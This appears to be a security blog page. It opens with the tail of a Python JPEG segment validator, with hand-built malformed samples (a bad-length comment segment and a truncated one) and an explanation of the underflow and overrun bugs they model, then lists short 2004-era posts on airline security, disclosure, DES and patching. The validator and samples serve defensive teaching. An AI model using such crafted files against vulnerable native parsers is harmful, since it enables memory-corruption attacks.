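    if len(data) < 2 or data[0] != 0xFF or data[1] != SOI:
        raise ValueError("missing SOI")
    segments: List[Tuple[int, bytes]] = [(SOI, b"")]
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:               # fill bytes may precede a marker
            pos += 1
            continue
        pos += 2
        if marker in STANDALONE:
            segments.append((marker, b""))
            if marker == EOI:
                return segments
            continue
        if pos + 2 > len(data):
            raise ValueError("truncated length field")
        (length,) = struct.unpack(">H", data[pos:pos + 2])
        if length < 2:
            # The length counts its own two bytes; anything smaller would turn a
            # "length - 2" payload-size computation into a huge unsigned value.
            raise ValueError(f"segment 0x{marker:02X} has bad length {length}")
        if pos + length > len(data):
            raise ValueError(f"segment 0x{marker:02X} runs past end of data")
        payload = data[pos + 2:pos + length]
        segments.append((marker, payload))
        pos += length
        if marker == SOS:
            return segments              # entropy-coded image data follows; stop here
    raise ValueError("no EOI or SOS before end of data")


def is_well_formed(data: bytes) -> bool:
    try:
        parse_segments(data)
        return True
    except ValueError:
        return False


def _segment(marker: int, payload: bytes) -> bytes:
    """Build a correctly sized segment for the constructed samples."""
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed: SOI, an APP0 (JFIF) header, a comment, EOI; headers only, no image.
GOOD = (bytes([0xFF, SOI])
        + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
        + _segment(0xFE, b"hello")
        + bytes([0xFF, EOI]))

# Constructed: a comment segment claiming length 1, smaller than the field itself.
BAD_LENGTH = (bytes([0xFF, SOI])
              + bytes([0xFF, 0xFE]) + struct.pack(">H", 1) + b"hello"
              + bytes([0xFF, EOI]))

# Constructed: a comment segment whose length points well past the end of the data.
TRUNCATED = bytes([0xFF, SOI]) + bytes([0xFF, 0xFE]) + struct.pack(">H", 500) + b"hi"

if __name__ == "__main__":
    for name, blob in (("GOOD", GOOD), ("BAD_LENGTH", BAD_LENGTH), ("TRUNCATED", TRUNCATED)):
        print(name, "well-formed" if is_well_formed(blob) else "rejected")
```

The two rejection branches are the ones that matter in a native parser: a length below 2 becomes an enormous copy size once the two length bytes are subtracted in unsigned arithmetic, and a length past the buffer end is a read overrun. A scanner like Microsoft’s tool is useful precisely because the same parsing code gets linked into many applications, so one bad length check surfaces in all of them.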

 

Apple Security Updates

Apple has released an updated Security Advisory, to fix two problems introduced in the previous rev. Not a big deal, unless you happened to be trying to deal with their ftpd. As we’ve pointed out (PDF) in the past, security updates are a race between attacks and defense, and there are trade-offs you can make. […]

 

Holy Lousy Security, Batman!

Britons seemed startled by the ease with which palace security was overrun by two men in super hero costumes carrying an extension ladder….Police used a crane to extract him from the ledge as his supporters chanted “free Batman” from behind a police cordon. From the New York Times story. Or, Google News has more. The […]

 

With so many planes, it had to happen

This is a remarkably cool shot, which SteveC asserts is a plane flying in front of “The ULO telescope as it observes the transit of Venus.” I started asking what are the odds, and then ended up at a back of the envelope, why are these so rare?

 

"Want more Secure Software?"

SecurityFocus points to a nice short article over at Silicon.com, which suggests that Gartner advises that for companies building their own software, developers should be pushed to put security at the head of their list. It’s not just in-house tech makers that need a word in their ears – the analysts suggest end users should give […]

 

Mathematical Classifications

Mathematicians use a scheme called the Mathematics Subject Classification, (MSC) which includes a “how to use“, as well as a long history of being revised to reflect changes in the field, and I would guess, practice in how to effectively classify things. It has a General and Miscellaneous Topics section, too. Articles must be given […]

 

Canadian Health Care

The New York Times reports on a lack of doctors in Canada, along with a rise in Canadians using emergency rooms to replace family doctors. (Use BugMeNot if you don’t want to register.) The basic problem is economic. Doctors are much better paid in the US than in Canada, and doctors can easily move. It’s […]

 

Shih shih…

The great linguist Chao Yuen-Ren once wrote an essay in Chinese using only words which (in Mandarin) would be transliterated as shih (using Wade-Giles; shi in pinyin). You can see the text in characters and two transliterations, read the translation (“A poet by the name of Shih Shih living in a stone den was fond […]

 

Bluetooth and phone security

Some Singaporean students have figured out how to use Bluetooth to turn off the cameras in Nokia’s phones, according to an article in Gizmodo, via a long chain to a now deleted newspaper article. I wonder if they turn it back on when you leave the area? However, Loosewire, the earliest still working link, implies […]

 

Airline "security"

The Webflyer points to a great David Rowell column, including: An argument ensued. Ms O’Leary not unreasonably thought it unfair to be trapped on the delayed flight when there was another flight due to leave shortly that she could make if allowed to leave the United Express flight. The pilot called the police who arrested […]

 

Swire on Disclosure

Peter Swire has a new working draft, A Model For When Disclosure Helps Security. It’s a great paper which lays out two main camps, which he calls open source and military, and explains why the underlying assumptions cause clashes over disclosure. That would be a useful paper, but he then extends it into a semi-mathematical […]

 

"Four More Pretzels?"

Over at American Spectator, Shawn Macomber writes about being arrested in New York this week, and suggests a reality TV show is in order: It could be called POWDERKEG! Each week, I’ll be arrested without my rights being read to me and held for 14 hours while police refuse to tell me what charges I’m […]

 

Taxonomies are hard

Responding to my earlier comments about science being easier at a distance, both Nude Cybot and Justin Mason have offered up substantial and useful comments on the subjects of biological taxonomies. (Justin’s have moved to email.) “Classification in Biology, or phylogenetics, is fraught with issues that we typically do not face when creating our own […]

 

Free Wheelchairs for Paraplegic Children

If you ever saw Julia Child or Jacques Pepin take apart a chicken, you’ll remember how easy they made it look. It’s a level of skill that we can all aspire to. Watching Ed Hasbrouck take apart the latest incarnation of free wheelchairs for paraplegic children is like watching Julia Child take apart a chicken. […]

 

Wikipedia vs Britannica tested

In Wikipedia vs. Britannica Smackdown, Ed Felten takes my challenge. In the meanwhile, I’d done some hypothesizing, here. So how’d I do? Hypothesis 1 is spot on. #2 is more challenging to assess: The errors in Britannica are smaller, and I think I’ll judge myself wrong. #3 I think is accurate, if only because of […]

 

Wikipedia vs Britannica

A few days ago, I challenged Ed Felten to do some more comparison work. In the spirit of Milgram, I didn’t propose a theory. (This was mostly because I was trying to make a good joke about assigning the professor homework, but couldn’t come up with one.) However, on consideration, I think that I should […]

 

Science is easier from the outside

As part of a larger project on security configuration issues, I’m doing a lot of learning about taxonomies and typologies right now. (A taxonomy is a hierarchical typology.) I am often jealous of the world of biology, where there are underlying realities that can be used for categorization purposes. (A taxonomy needs a decision tree. […]

 

Volokh commentary

This post by Todd Zywicki clearly illustrates the difference between law professors and economics professors.

 

Airline Security

In Educated Guesswork, Eric Rescorla writes about one way tickets and the search criteria. The CAPPS program was created by Northwest airlines, who set the criteria for inclusion. They included one way tickets to enforce their bizarre pricing schemes. This is the same reason they started asking for ID: to cut down on the resale […]

 

Wikipedia

Over at Freedom To Tinker, Ed Felten writes about the Wikipedia quality debate. He takes a sampling of six entries where he’s competent to judge their quality, and assesses them. Two were excellent, one was slightly inaccurate, two were more in depth, but perhaps less accessible than a standard encyclopedia, and one (on the US […]

 

Lock 'em up!

Over at TaoSecurity, Richard writes: Remember that one of the best ways to prevent intrusions is to help put criminals behind bars by collecting evidence and supporting the prosecution of offenders. The only way to ensure a specific Internet-based threat never bothers your organization is to separate him from his keyboard! Firstly, I’m very glad […]

 

The Man Who Shocked the World

I’ve recently finished The Man Who Shocked the World, a biography of Stanley Milgram. The book’s title refers to the “Authority Experiments,” wherein a researcher pressured a subject to deliver shocks to a victim. The subjects of the experiments, despite expressing feelings that what they were doing was wrong, were generally willing to continue. Other […]

 

Unrecoverable Damage?

I’m reading through NIST SP-800-70 (pdf), the NIST guide to producing security configuration guides. Let me get more coffee before I continue. Thanks for waiting. “If home users and other users without deep security expertise attempt to apply High Security checklists to their systems, they would typically experience unwanted limitations on system functionality and possibly […]

 

Lewis Carroll

Or, if you prefer, the original can be found elsewhere. It’s always nice when things I want to abuse like that are in the public domain. (Obligatory Lessig link.) But beyond that, think how much poorer literature in the computer science field would be if we didn’t have Alice In Wonderland to freely quote from, […]

 

Self-referential nonsense

“The time has come,” the Walrus said, “To talk of many things: Of shoes–and ships–and sealing-wax– Of cabbages–and kings– And why the sea is boiling hot– And whether pigs have wings.” “But wait a bit,” the Oysters cried, “Before we have our chat; For some of us are out of breath, And all of us […]

 

Olympic Security

Bruce Schneier has written insightfully about Olympic security. They’ve spent $1.5 billion, and today’s marathon race was marred by some idiot leaping into the path of the front-runner, and dragging him into the crowd. It’s always tempting, and usually wrong, to say that any failure of security could be prevented. However, this Olympics has seen […]

 

In memory of Frank Sanache

Frank Sanache was one of eight Meskwaki code talkers. He served in North Africa, and was captured by the Germans. I’m fairly interested in the history of code talkers, and had missed the Army’s use of them. It turns out that there were code talkers in the First World War, that German civilians had travelled to […]

 

Bea Arthur, Terrorist

Beatrice Arthur, who apparently enjoys a little politics along with her fame, got irked at the airport police: “She started yelling that it wasn’t hers and said ‘The terrorists put it there,’ ” a fellow passenger said. “She kept yelling about the ‘terrorists, the terrorists, the terrorists.’ ” After the blade was confiscated, Arthur took […]

 

About those insiders

Over at TaoSecurity, Richard writes about a new report from CERT/CC and the Secret Service, studying “23 incidents carried out by 26 insiders in the banking and finance sector between 1996 and 2002.” I’m very glad that they’re doing this. I think that actually studying how bad guys carry out attacks is critical for defending […]

 

Hands off my bag!

The fine folks at handsoffmybag.com have the first set of their tote bags emblazoned with the 4th Amendment, and are shipping! Get yours before they’re outlawed!

 

Is Disabling Javascript a Win?

(Dave asked in a comment.) Yes, disabling Javascript is a win. Here’s an IE issue, and here’s one for Mozilla. Now, using Javascript, when it’s on, to reduce the number of clicks a user needs to make is a fine thing. I’m in favor of it. (Although I often find myself in misselect hell, when […]

 

Shut down these shadowy groups?

“The president said he wanted to work together (with McCain) to pursue court action to shut down all the ads and activity by the shadowy … groups,” White House spokesman Scott McClellan told reporters Shadowy? What’s shadowy about free speech? There’s a very bad law in place which restricts your ability to spend your money […]

 

XP SP2

So Microsoft has released XP SP2 on a CD. I’m not currently running any Windows machines, but I figure hey, this is an important patch, and I should be able to foist it on people. So I go to Microsoft’s Order a CD site. I am curious to see what else the CD might contain. A […]

 

Patch Management

Alec Muffett comments on sysadmin resistance to applying patches. As Steve Beattie and a bunch of others of us wrote about, the issue is that there’s a tradeoff to be made to find the optimal uptime for a system. It’s a tradeoff between a security risk and an operational risk. Organizationally, different teams are often […]

 

That exalted state

“The Central Intelligence Agency is committed to protecting your privacy and will collect no personal information about you unless you choose to provide that information to us.” Of course, this just goes to show that “We’re committed to protecting your privacy” has finally made it to the exalted and hard-to-reach level of “Of course I’ll […]

 

Secret Laws Work So Well

So it seems that two members of Congress have now been added to “watch lists.” “[Representative John] Lewis contacted the Department of Transportation, the Department of Homeland Security and executives at various airlines in a so-far fruitless effort to get his name off the list, said spokeswoman Brenda Jones.” It seems that this sort of […]

 

Time for DES to go?

In 1977, the government certified the Data Encryption Standard (DES), with a planned lifetime of 15 years. It has now been in use for nearly 30 years, and no longer offers even decent security. Over 6 years ago, the EFF built Deep Crack, a purpose-built machine for breaking DES, which cracked keys in under a day. NIST […]

 

Why did Google pop? (II)

According to David Garrity, a technology analyst in New York with Caris & Co.: It was supposed to democratize the process and let people buy in at just a few shares, but it was a miserable failure because the organizers didn’t realize the securities regulations that require people who bid to have a certain net […]

 

Why did Google pop?

So Google popped 18% today. That shouldn’t have happened. The goal of their much-discussed auction was to ensure that they made money. The typical bubble IPO involved a “pop” of as much as 100-300% on opening day. This put huge sums in the hands of bankers and the bankers’ friends, sometimes illegally. Ideally, Google’s trading […]